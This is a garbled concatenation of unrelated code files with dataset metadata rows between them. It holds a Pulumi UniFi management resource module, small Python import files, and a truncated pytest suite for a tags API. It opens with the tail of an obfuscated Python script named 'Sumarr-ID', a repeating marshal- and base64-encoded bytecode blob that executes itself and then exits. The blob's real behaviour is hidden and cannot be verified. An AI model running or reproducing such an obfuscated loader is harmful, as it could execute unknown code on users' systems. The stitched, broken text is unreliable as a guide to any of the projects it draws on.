x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02(\x04\x00\x00\x00t\x06\x00\x00\x00base64t\x02\x00\x00\x00ost\x03\x00\x00\x00syst\x04\x00\x00\x00exit(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x03\x00\x00\x00asw\x04\x00\x00\x00s\x04\x00\x00\x00\x00\x01\x0e\x00(\x06\x00\x00\x00R\x02\x00\x00\x00R\x03\x00\x00\x00t\x07\x00\x00\x00marshalR\x00\x00\x00\x00R\x01\x00\x00\x00R\x05\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\t\x00\x00\x00Sumarr-IDt\x08\x00\x00\x00<module>\x02\x00\x00\x00s\x06\x00\x00\x00\x18\x01\x10\x01\t\x02'));os.sys.exit()
asw() | 30,898.833333 | 185,304 | 0.760859 | 41,766 | 185,393 | 3.377221 | 0.007566 | 0.555834 | 0.449001 | 0.466803 | 0.98419 | 0.983141 | 0.982872 | 0.982872 | 0.982652 | 0.982652 | 0 | 0.429919 | 0.000237 | 185,393 | 6 | 185,305 | 30,898.833333 | 0.331094 | 0.000108 | 0 | 0 | 0 | 0.2 | 0.429178 | 0.428876 | 0 | 0 | 0 | 0 | 0 | 1 | 0.2 | true | 0 | 0.6 | 0 | 0.8 | 0 | 0 | 0 | 0 | null | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 18 |
9d85cf269962bdf3229d00317d0e3db8bc62f27e | 106 | py | Python | tarexp/helper/__init__.py | eugene-yang/tarexp | 3037462b41ea3a5aa3faf6afa71db0de5c14e88f | [
"Apache-2.0"
] | 13 | 2022-02-23T09:39:05.000Z | 2022-03-25T15:34:38.000Z | tarexp/helper/__init__.py | eugene-yang/tarexp | 3037462b41ea3a5aa3faf6afa71db0de5c14e88f | [
"Apache-2.0"
] | null | null | null | tarexp/helper/__init__.py | eugene-yang/tarexp | 3037462b41ea3a5aa3faf6afa71db0de5c14e88f | [
"Apache-2.0"
] | null | null | null | from tarexp.helper.pandas_tools import createDFfromResults
from tarexp.helper.plotting import cost_dynamic | 53 | 58 | 0.896226 | 14 | 106 | 6.642857 | 0.714286 | 0.215054 | 0.344086 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.066038 | 106 | 2 | 59 | 53 | 0.939394 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 7 |
9d8feea124536cd75b504594b22783808e4433cd | 12,514 | py | Python | sdk/python/pulumiverse_unifi/setting_mgmt.py | pulumiverse/pulumi-unifi | e22e1bef9b409c71ad578b5d9e39284a26da355c | [
"ECL-2.0",
"Apache-2.0"
] | 1 | 2022-03-29T18:49:28.000Z | 2022-03-29T18:49:28.000Z | sdk/python/pulumiverse_unifi/setting_mgmt.py | pulumiverse/pulumi-unifi | e22e1bef9b409c71ad578b5d9e39284a26da355c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | sdk/python/pulumiverse_unifi/setting_mgmt.py | pulumiverse/pulumi-unifi | e22e1bef9b409c71ad578b5d9e39284a26da355c | [
"ECL-2.0",
"Apache-2.0"
] | null | null | null | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi Terraform Bridge (tfgen) Tool. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from . import _utilities
from . import outputs
from ._inputs import *
__all__ = ['SettingMgmtArgs', 'SettingMgmt']
@pulumi.input_type
class SettingMgmtArgs:
def __init__(__self__, *,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]] = None):
"""
The set of arguments for constructing a SettingMgmt resource.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]] ssh_keys: SSH key.
"""
if auto_upgrade is not None:
pulumi.set(__self__, "auto_upgrade", auto_upgrade)
if site is not None:
pulumi.set(__self__, "site", site)
if ssh_enabled is not None:
pulumi.set(__self__, "ssh_enabled", ssh_enabled)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Automatically upgrade device firmware.
"""
return pulumi.get(self, "auto_upgrade")
@auto_upgrade.setter
def auto_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_upgrade", value)
@property
@pulumi.getter
def site(self) -> Optional[pulumi.Input[str]]:
"""
The name of the site to associate the settings with.
"""
return pulumi.get(self, "site")
@site.setter
def site(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "site", value)
@property
@pulumi.getter(name="sshEnabled")
def ssh_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable SSH authentication.
"""
return pulumi.get(self, "ssh_enabled")
@ssh_enabled.setter
def ssh_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssh_enabled", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]:
"""
SSH key.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]):
pulumi.set(self, "ssh_keys", value)
@pulumi.input_type
class _SettingMgmtState:
def __init__(__self__, *,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]] = None):
"""
Input properties used for looking up and filtering SettingMgmt resources.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]] ssh_keys: SSH key.
"""
if auto_upgrade is not None:
pulumi.set(__self__, "auto_upgrade", auto_upgrade)
if site is not None:
pulumi.set(__self__, "site", site)
if ssh_enabled is not None:
pulumi.set(__self__, "ssh_enabled", ssh_enabled)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> Optional[pulumi.Input[bool]]:
"""
Automatically upgrade device firmware.
"""
return pulumi.get(self, "auto_upgrade")
@auto_upgrade.setter
def auto_upgrade(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "auto_upgrade", value)
@property
@pulumi.getter
def site(self) -> Optional[pulumi.Input[str]]:
"""
The name of the site to associate the settings with.
"""
return pulumi.get(self, "site")
@site.setter
def site(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "site", value)
@property
@pulumi.getter(name="sshEnabled")
def ssh_enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Enable SSH authentication.
"""
return pulumi.get(self, "ssh_enabled")
@ssh_enabled.setter
def ssh_enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "ssh_enabled", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]:
"""
SSH key.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input['SettingMgmtSshKeyArgs']]]]):
pulumi.set(self, "ssh_keys", value)
class SettingMgmt(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]]] = None,
__props__=None):
"""
`SettingMgmt` manages settings for a unifi site.
## Example Usage
```python
import pulumi
import pulumiverse_unifi as unifi
example_site = unifi.Site("exampleSite", description="example")
example_setting_mgmt = unifi.SettingMgmt("exampleSettingMgmt",
site=example_site.name,
auto_upgrade=True)
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]] ssh_keys: SSH key.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: Optional[SettingMgmtArgs] = None,
opts: Optional[pulumi.ResourceOptions] = None):
"""
`SettingMgmt` manages settings for a unifi site.
## Example Usage
```python
import pulumi
import pulumiverse_unifi as unifi
example_site = unifi.Site("exampleSite", description="example")
example_setting_mgmt = unifi.SettingMgmt("exampleSettingMgmt",
site=example_site.name,
auto_upgrade=True)
```
:param str resource_name: The name of the resource.
:param SettingMgmtArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(SettingMgmtArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.plugin_download_url is None:
opts.plugin_download_url = _utilities.get_plugin_download_url()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = SettingMgmtArgs.__new__(SettingMgmtArgs)
__props__.__dict__["auto_upgrade"] = auto_upgrade
__props__.__dict__["site"] = site
__props__.__dict__["ssh_enabled"] = ssh_enabled
__props__.__dict__["ssh_keys"] = ssh_keys
super(SettingMgmt, __self__).__init__(
'unifi:index/settingMgmt:SettingMgmt',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
auto_upgrade: Optional[pulumi.Input[bool]] = None,
site: Optional[pulumi.Input[str]] = None,
ssh_enabled: Optional[pulumi.Input[bool]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]]] = None) -> 'SettingMgmt':
"""
Get an existing SettingMgmt resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[bool] auto_upgrade: Automatically upgrade device firmware.
:param pulumi.Input[str] site: The name of the site to associate the settings with.
:param pulumi.Input[bool] ssh_enabled: Enable SSH authentication.
:param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['SettingMgmtSshKeyArgs']]]] ssh_keys: SSH key.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _SettingMgmtState.__new__(_SettingMgmtState)
__props__.__dict__["auto_upgrade"] = auto_upgrade
__props__.__dict__["site"] = site
__props__.__dict__["ssh_enabled"] = ssh_enabled
__props__.__dict__["ssh_keys"] = ssh_keys
return SettingMgmt(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="autoUpgrade")
def auto_upgrade(self) -> pulumi.Output[Optional[bool]]:
"""
Automatically upgrade device firmware.
"""
return pulumi.get(self, "auto_upgrade")
@property
@pulumi.getter
def site(self) -> pulumi.Output[str]:
"""
The name of the site to associate the settings with.
"""
return pulumi.get(self, "site")
@property
@pulumi.getter(name="sshEnabled")
def ssh_enabled(self) -> pulumi.Output[Optional[bool]]:
"""
Enable SSH authentication.
"""
return pulumi.get(self, "ssh_enabled")
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> pulumi.Output[Optional[Sequence['outputs.SettingMgmtSshKey']]]:
"""
SSH key.
"""
return pulumi.get(self, "ssh_keys")
| 39.476341 | 137 | 0.637286 | 1,398 | 12,514 | 5.450644 | 0.113734 | 0.099606 | 0.089764 | 0.054331 | 0.769948 | 0.75 | 0.745932 | 0.735564 | 0.724672 | 0.705118 | 0 | 0.000107 | 0.253876 | 12,514 | 316 | 138 | 39.601266 | 0.816001 | 0.262027 | 0 | 0.728814 | 1 | 0 | 0.099105 | 0.029308 | 0 | 0 | 0 | 0 | 0 | 1 | 0.152542 | false | 0.00565 | 0.039548 | 0 | 0.282486 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
9d9ab3f5487b80592a2ab42f609915494deec024 | 94 | py | Python | info/api/user/__init__.py | googleliyang/flask_house_rent | 93299086058ef5e6e32759c15fba2ade21c992b5 | [
"Apache-2.0"
] | null | null | null | info/api/user/__init__.py | googleliyang/flask_house_rent | 93299086058ef5e6e32759c15fba2ade21c992b5 | [
"Apache-2.0"
] | 4 | 2021-03-18T22:19:24.000Z | 2022-03-11T23:40:16.000Z | info/api/user/__init__.py | googleliyang/flask_house_rent | 93299086058ef5e6e32759c15fba2ade21c992b5 | [
"Apache-2.0"
] | null | null | null | from flask import Blueprint
user_blue = Blueprint('user_blue', __name__)
from . import user
| 15.666667 | 44 | 0.776596 | 13 | 94 | 5.153846 | 0.538462 | 0.38806 | 0.507463 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.148936 | 94 | 5 | 45 | 18.8 | 0.8375 | 0 | 0 | 0 | 0 | 0 | 0.095745 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.666667 | 0 | 0.666667 | 0.666667 | 1 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 1 | 0 | 7 |
9dbe6d439f6e1f7657533309c667f84483eb1348 | 20,303 | py | Python | plgx-esp-ui/tests/test_tag_endpoints.py | dhoomakethu/plgx-esp | b466b52a5e16a0d12a61e505e48add83bee5bad4 | [
"MIT"
] | 20 | 2019-12-09T13:55:13.000Z | 2022-01-10T09:10:42.000Z | plgx-esp-ui/tests/test_tag_endpoints.py | dhoomakethu/plgx-esp | b466b52a5e16a0d12a61e505e48add83bee5bad4 | [
"MIT"
] | 13 | 2019-12-03T13:27:27.000Z | 2021-12-03T05:22:49.000Z | plgx-esp-ui/tests/test_tag_endpoints.py | dhoomakethu/plgx-esp | b466b52a5e16a0d12a61e505e48add83bee5bad4 | [
"MIT"
] | 16 | 2019-11-15T11:45:06.000Z | 2022-01-07T08:07:11.000Z | """
All Test-Case required client, url_prefix and token,
and these all we need to just pass as parameters in the function.
"""
import json
from flask_restplus import marshal
from polylogyx.dao import tags_dao, packs_dao, hosts_dao, queries_dao
from polylogyx.models import Tag
from polylogyx.wrappers import tag_wrappers, query_wrappers, pack_wrappers
class TestTagsList:
"""
Test-case inside this block where these payloads are used,
all are optional value and start, limit are of positive natural number type,
while searchterm is of str type and default value is empty str,
so if types of values passed that is not matched with specified type,
then it will return 400 i.e., bad request
"""
payload = {'start': None, "limit": None, "searchterm": ''}
def test_get_tag_list_without_payload(self, client, url_prefix, token):
"""
Test-case without paylods and without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 0
assert response_dict['data']['results'] == []
def test_get_tag_list_with_empty_payload(self, client, url_prefix, token):
"""
Test-case with paylod is empty dictionary and
without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json={})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 0
assert response_dict['data']['results'] == []
def test_get_tag_list_with_payload(self, client, url_prefix, token):
"""
Test-case with paylod values are none and empty str
and without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
self.payload['start'] = 0
self.payload['limit'] = 5
self.payload['searchterm'] = "abc"
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 0
assert response_dict['data']['results'] == []
def test_get_tag_list_invalid_method(self, client, url_prefix, token):
"""
Test-case with invalid request method,
expected output:- status code is 405
"""
resp = client.put(url_prefix + '/tags', headers={'x-access-token': token})
assert resp.status_code == 405
def test_get_tag_list_without_payload_with_data(self, client, url_prefix, token, tag):
"""
Test-case without paylods and with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
list_dict_data = [
{
'value': tag.value, 'nodes': [node.host_identifier for node in tag.nodes],
'packs': [pack.name for pack in tag.packs],
'queries': [query.name for query in tag.queries],
'file_paths': tag.file_paths
}
for tag in tags_dao.get_all_tags()
]
data = marshal(list_dict_data, tag_wrappers.tag_wrapper)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 1
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == data
def test_get_tag_list_without_empty_payload_with_data(self, client, url_prefix, token, tag):
"""
Test-case with paylod is empty dictionary and
with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json={})
assert resp.status_code == 200
response_dict = json.loads(resp.data)
list_dict_data = [
{
'value': tag.value, 'nodes': [node.host_identifier for node in tag.nodes],
'packs': [pack.name for pack in tag.packs],
'queries': [query.name for query in tag.queries],
'file_paths': tag.file_paths
}
for tag in tags_dao.get_all_tags()
]
data = marshal(list_dict_data, tag_wrappers.tag_wrapper)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 1
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == data
def test_get_tag_list_with_payload_with_data(self, client, url_prefix, token, tag):
"""
Test-case with all payload value and
without existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
self.payload['start'] = 0
self.payload['limit'] = 5
self.payload['searchterm'] = "abc"
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 0
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == []
def test_get_tag_list_with_valid_payload_with_data(self, client, url_prefix, token, tag):
"""
Test-case with paylod values are none and empty str
and with existing node, queries, tags and file_path,
expected output:- status is success, and
count, total_count and resultant data
"""
self.payload['start'] = 0
self.payload['limit'] = 5
self.payload['searchterm'] = "test"
resp = client.get(url_prefix + '/tags', headers={'x-access-token': token}, json=self.payload)
assert resp.status_code == 200
list_dict_data = [
{
'value': tag.value, 'nodes': [node.host_identifier for node in tag.nodes],
'packs': [pack.name for pack in tag.packs],
'queries': [query.name for query in tag.queries],
'file_paths': tag.file_paths
}
for tag in tags_dao.get_all_tags()
]
data = marshal(list_dict_data, tag_wrappers.tag_wrapper)
response_dict = json.loads(resp.data)
assert response_dict['status'] == 'success'
assert response_dict['data']['count'] == 1
assert response_dict['data']['total_count'] == 1
assert response_dict['data']['results'] == data
class TestAddTag:
"""
Test-case inside this block where this payload value is used,
